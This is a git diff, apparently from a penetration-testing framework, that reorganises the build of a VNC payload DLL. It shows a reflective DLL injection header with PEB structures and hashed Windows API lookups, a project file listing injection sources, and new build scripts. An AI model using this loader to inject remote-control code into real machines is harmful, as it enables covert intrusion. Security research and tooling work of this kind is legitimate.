// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
#include <Winsock2.h>
|
|
||||||
#include <intrin.h>
|
|
||||||
|
|
||||||
#include "ReflectiveDLLInjection.h"
|
|
||||||
|
|
||||||
#define EXITFUNC_SEH 0xEA320EFE
|
|
||||||
#define EXITFUNC_THREAD 0x0A2A1DE0
|
|
||||||
#define EXITFUNC_PROCESS 0x56A2B5F0
|
|
||||||
|
|
||||||
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
|
|
||||||
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
|
|
||||||
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
|
|
||||||
|
|
||||||
#define KERNEL32DLL_HASH 0x6A4ABC5B
|
|
||||||
#define LOADLIBRARYA_HASH 0xEC0E4E8E
|
|
||||||
#define GETPROCADDRESS_HASH 0x7C0DFCAA
|
|
||||||
#define VIRTUALALLOC_HASH 0x91AFCA54
|
|
||||||
|
|
||||||
#define HASH_KEY 13
|
|
||||||
//===============================================================================================//
|
|
||||||
#pragma intrinsic( _rotr )
|
|
||||||
|
|
||||||
__forceinline DWORD ror( DWORD d )
|
|
||||||
{
|
|
||||||
return _rotr( d, HASH_KEY );
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
__forceinline DWORD hash( char * c )
|
|
||||||
{
|
|
||||||
register DWORD h = 0;
|
|
||||||
do
|
|
||||||
{
|
|
||||||
h = ror( h );
|
|
||||||
h += *c;
|
|
||||||
} while( *++c );
|
|
||||||
|
|
||||||
return h;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
typedef struct _UNICODE_STR
|
|
||||||
{
|
|
||||||
USHORT Length;
|
|
||||||
USHORT MaximumLength;
|
|
||||||
PWSTR pBuffer;
|
|
||||||
} UNICODE_STR, *PUNICODE_STR;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
|
|
||||||
//__declspec( align(8) )
|
|
||||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
|
||||||
{
|
|
||||||
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
PVOID DllBase;
|
|
||||||
PVOID EntryPoint;
|
|
||||||
ULONG SizeOfImage;
|
|
||||||
UNICODE_STR FullDllName;
|
|
||||||
UNICODE_STR BaseDllName;
|
|
||||||
ULONG Flags;
|
|
||||||
SHORT LoadCount;
|
|
||||||
SHORT TlsIndex;
|
|
||||||
LIST_ENTRY HashTableEntry;
|
|
||||||
ULONG TimeDateStamp;
|
|
||||||
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
|
|
||||||
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
|
|
||||||
{
|
|
||||||
DWORD dwLength;
|
|
||||||
DWORD dwInitialized;
|
|
||||||
LPVOID lpSsHandle;
|
|
||||||
LIST_ENTRY InLoadOrderModuleList;
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
LPVOID lpEntryInProgress;
|
|
||||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
|
|
||||||
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
|
|
||||||
{
|
|
||||||
struct _PEB_FREE_BLOCK * pNext;
|
|
||||||
DWORD dwSize;
|
|
||||||
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
|
|
||||||
|
|
||||||
// struct _PEB is defined in Winternl.h but it is incomplete
|
|
||||||
// WinDbg> dt -v ntdll!_PEB
|
|
||||||
typedef struct __PEB // 65 elements, 0x210 bytes
|
|
||||||
{
|
|
||||||
BYTE bInheritedAddressSpace;
|
|
||||||
BYTE bReadImageFileExecOptions;
|
|
||||||
BYTE bBeingDebugged;
|
|
||||||
BYTE bSpareBool;
|
|
||||||
LPVOID lpMutant;
|
|
||||||
LPVOID lpImageBaseAddress;
|
|
||||||
PPEB_LDR_DATA pLdr;
|
|
||||||
LPVOID lpProcessParameters;
|
|
||||||
LPVOID lpSubSystemData;
|
|
||||||
LPVOID lpProcessHeap;
|
|
||||||
PRTL_CRITICAL_SECTION pFastPebLock;
|
|
||||||
LPVOID lpFastPebLockRoutine;
|
|
||||||
LPVOID lpFastPebUnlockRoutine;
|
|
||||||
DWORD dwEnvironmentUpdateCount;
|
|
||||||
LPVOID lpKernelCallbackTable;
|
|
||||||
DWORD dwSystemReserved;
|
|
||||||
DWORD dwAtlThunkSListPtr32;
|
|
||||||
PPEB_FREE_BLOCK pFreeList;
|
|
||||||
DWORD dwTlsExpansionCounter;
|
|
||||||
LPVOID lpTlsBitmap;
|
|
||||||
DWORD dwTlsBitmapBits[2];
|
|
||||||
LPVOID lpReadOnlySharedMemoryBase;
|
|
||||||
LPVOID lpReadOnlySharedMemoryHeap;
|
|
||||||
LPVOID lpReadOnlyStaticServerData;
|
|
||||||
LPVOID lpAnsiCodePageData;
|
|
||||||
LPVOID lpOemCodePageData;
|
|
||||||
LPVOID lpUnicodeCaseTableData;
|
|
||||||
DWORD dwNumberOfProcessors;
|
|
||||||
DWORD dwNtGlobalFlag;
|
|
||||||
LARGE_INTEGER liCriticalSectionTimeout;
|
|
||||||
DWORD dwHeapSegmentReserve;
|
|
||||||
DWORD dwHeapSegmentCommit;
|
|
||||||
DWORD dwHeapDeCommitTotalFreeThreshold;
|
|
||||||
DWORD dwHeapDeCommitFreeBlockThreshold;
|
|
||||||
DWORD dwNumberOfHeaps;
|
|
||||||
DWORD dwMaximumNumberOfHeaps;
|
|
||||||
LPVOID lpProcessHeaps;
|
|
||||||
LPVOID lpGdiSharedHandleTable;
|
|
||||||
LPVOID lpProcessStarterHelper;
|
|
||||||
DWORD dwGdiDCAttributeList;
|
|
||||||
LPVOID lpLoaderLock;
|
|
||||||
DWORD dwOSMajorVersion;
|
|
||||||
DWORD dwOSMinorVersion;
|
|
||||||
WORD wOSBuildNumber;
|
|
||||||
WORD wOSCSDVersion;
|
|
||||||
DWORD dwOSPlatformId;
|
|
||||||
DWORD dwImageSubsystem;
|
|
||||||
DWORD dwImageSubsystemMajorVersion;
|
|
||||||
DWORD dwImageSubsystemMinorVersion;
|
|
||||||
DWORD dwImageProcessAffinityMask;
|
|
||||||
DWORD dwGdiHandleBuffer[34];
|
|
||||||
LPVOID lpPostProcessInitRoutine;
|
|
||||||
LPVOID lpTlsExpansionBitmap;
|
|
||||||
DWORD dwTlsExpansionBitmapBits[32];
|
|
||||||
DWORD dwSessionId;
|
|
||||||
ULARGE_INTEGER liAppCompatFlags;
|
|
||||||
ULARGE_INTEGER liAppCompatFlagsUser;
|
|
||||||
LPVOID lppShimData;
|
|
||||||
LPVOID lpAppCompatInfo;
|
|
||||||
UNICODE_STR usCSDVersion;
|
|
||||||
LPVOID lpActivationContextData;
|
|
||||||
LPVOID lpProcessAssemblyStorageMap;
|
|
||||||
LPVOID lpSystemDefaultActivationContextData;
|
|
||||||
LPVOID lpSystemAssemblyStorageMap;
|
|
||||||
DWORD dwMinimumStackCommit;
|
|
||||||
} _PEB, * _PPEB;
|
|
||||||
|
|
||||||
typedef struct
|
|
||||||
{
|
|
||||||
WORD offset:12;
|
|
||||||
WORD type:4;
|
|
||||||
} IMAGE_RELOC, *PIMAGE_RELOC;
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,6 +0,0 @@
|
||||||
|
|
||||||
#ifdef _X64_
|
|
||||||
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
|
|
||||||
#else
|
|
||||||
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
|
|
||||||
#endif
|
|
|
@ -1,437 +0,0 @@
|
||||||
<?xml version="1.0" encoding="Windows-1252"?>
|
|
||||||
<VisualStudioProject
|
|
||||||
ProjectType="Visual C++"
|
|
||||||
Version="9.00"
|
|
||||||
Name="loader"
|
|
||||||
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
|
|
||||||
RootNamespace="loader"
|
|
||||||
Keyword="Win32Proj"
|
|
||||||
TargetFrameworkVersion="196613"
|
|
||||||
>
|
|
||||||
<Platforms>
|
|
||||||
<Platform
|
|
||||||
Name="Win32"
|
|
||||||
/>
|
|
||||||
<Platform
|
|
||||||
Name="x64"
|
|
||||||
/>
|
|
||||||
</Platforms>
|
|
||||||
<ToolFiles>
|
|
||||||
</ToolFiles>
|
|
||||||
<Configurations>
|
|
||||||
<Configuration
|
|
||||||
Name="Debug|Win32"
|
|
||||||
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
CharacterSet="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="0"
|
|
||||||
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
MinimalRebuild="true"
|
|
||||||
BasicRuntimeChecks="3"
|
|
||||||
RuntimeLibrary="3"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="4"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
LinkIncremental="2"
|
|
||||||
GenerateDebugInformation="true"
|
|
||||||
SubSystem="2"
|
|
||||||
TargetMachine="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Debug|x64"
|
|
||||||
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
CharacterSet="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
TargetEnvironment="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="0"
|
|
||||||
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
|
|
||||||
MinimalRebuild="true"
|
|
||||||
BasicRuntimeChecks="3"
|
|
||||||
RuntimeLibrary="3"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
LinkIncremental="2"
|
|
||||||
GenerateDebugInformation="true"
|
|
||||||
SubSystem="2"
|
|
||||||
TargetMachine="17"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Release|Win32"
|
|
||||||
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
UseOfMFC="1"
|
|
||||||
CharacterSet="2"
|
|
||||||
WholeProgramOptimization="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="2"
|
|
||||||
EnableIntrinsicFunctions="true"
|
|
||||||
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
RuntimeLibrary="0"
|
|
||||||
EnableFunctionLevelLinking="true"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
CompileAs="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
PreprocessorDefinitions="_X86_"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
|
|
||||||
OutputFile="release\vncdll.dll"
|
|
||||||
LinkIncremental="1"
|
|
||||||
GenerateManifest="false"
|
|
||||||
GenerateDebugInformation="false"
|
|
||||||
SubSystem="2"
|
|
||||||
OptimizeReferences="2"
|
|
||||||
EnableCOMDATFolding="2"
|
|
||||||
RandomizedBaseAddress="1"
|
|
||||||
DataExecutionPrevention="1"
|
|
||||||
TargetMachine="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
CommandLine="copy /y "release\vncdll.dll" "..\output\""
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Release|x64"
|
|
||||||
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
UseOfMFC="1"
|
|
||||||
CharacterSet="2"
|
|
||||||
WholeProgramOptimization="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
TargetEnvironment="3"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="2"
|
|
||||||
EnableIntrinsicFunctions="true"
|
|
||||||
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
RuntimeLibrary="0"
|
|
||||||
EnableFunctionLevelLinking="true"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="3"
|
|
||||||
CompileAs="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
PreprocessorDefinitions="_X64_"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
|
|
||||||
OutputFile="release\vncdll.x64.dll"
|
|
||||||
LinkIncremental="1"
|
|
||||||
GenerateManifest="false"
|
|
||||||
GenerateDebugInformation="false"
|
|
||||||
SubSystem="2"
|
|
||||||
OptimizeReferences="2"
|
|
||||||
EnableCOMDATFolding="2"
|
|
||||||
RandomizedBaseAddress="1"
|
|
||||||
DataExecutionPrevention="1"
|
|
||||||
TargetMachine="17"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
CommandLine="copy /y "release\vncdll.x64.dll" "..\output\""
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
</Configurations>
|
|
||||||
<References>
|
|
||||||
</References>
|
|
||||||
<Files>
|
|
||||||
<Filter
|
|
||||||
Name="Source Files"
|
|
||||||
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
|
|
||||||
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\context.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<Filter
|
|
||||||
Name="rdi"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\LoadLibraryR.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveLoader.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="core"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\inject.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ps.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\session.c"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="Header Files"
|
|
||||||
Filter="h;hpp;hxx;hm;inl;inc;xsd"
|
|
||||||
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\context.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<Filter
|
|
||||||
Name="rdi"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\LoadLibraryR.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveDLLInjection.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ReflectiveLoader.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="core"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\inject.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\ps.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
<File
|
|
||||||
RelativePath=".\session.h"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Filter>
|
|
||||||
<Filter
|
|
||||||
Name="Resource Files"
|
|
||||||
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
|
|
||||||
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
|
|
||||||
>
|
|
||||||
<File
|
|
||||||
RelativePath=".\loader.rc"
|
|
||||||
>
|
|
||||||
</File>
|
|
||||||
</Filter>
|
|
||||||
</Files>
|
|
||||||
<Globals>
|
|
||||||
</Globals>
|
|
||||||
</VisualStudioProject>
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
@ECHO OFF
|
||||||
|
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
|
||||||
|
|
||||||
|
IF "%1"=="x86" GOTO BUILD_X86
|
||||||
|
IF "%1"=="X64" GOTO BUILD_X64
|
||||||
|
|
||||||
|
ECHO "Building VNCDLL x64 and x86 (Release)"
|
||||||
|
SET PLAT=all
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X86
|
||||||
|
ECHO "Building VNCDLL x86 (Release)"
|
||||||
|
SET PLAT=x86
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:BUILD_X64
|
||||||
|
ECHO "Building VNCDLL x64 (Release)"
|
||||||
|
SET PLAT=x64
|
||||||
|
GOTO RUN
|
||||||
|
|
||||||
|
:RUN
|
||||||
|
PUSHD workspace
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
|
||||||
|
GOTO :END
|
||||||
|
|
||||||
|
:NEED_VS
|
||||||
|
ECHO "This command must be executed from within a Visual Studio Command prompt."
|
||||||
|
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
|
||||||
|
|
||||||
|
:END
|
|
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\vncdll.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building VNCDLL x86 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building VNCDLL x64 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
Binary file not shown.
Binary file not shown.
30
external/source/vncdll/winvnc/vncdll.sln → external/source/vncdll/vncdll.sln
vendored
Normal file → Executable file
30
external/source/vncdll/winvnc/vncdll.sln → external/source/vncdll/vncdll.sln
vendored
Normal file → Executable file
|
@ -1,11 +1,10 @@
|
||||||
Microsoft Visual Studio Solution File, Format Version 10.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual C++ Express 2008
|
# Visual Studio 2013
|
||||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
|
||||||
EndProject
|
EndProject
|
||||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
|
||||||
ProjectSection(ProjectDependencies) = postProject
|
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
|
|
||||||
EndProjectSection
|
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
@ -15,19 +14,22 @@ Global
|
||||||
Release|x64 = Release|x64
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
|
||||||
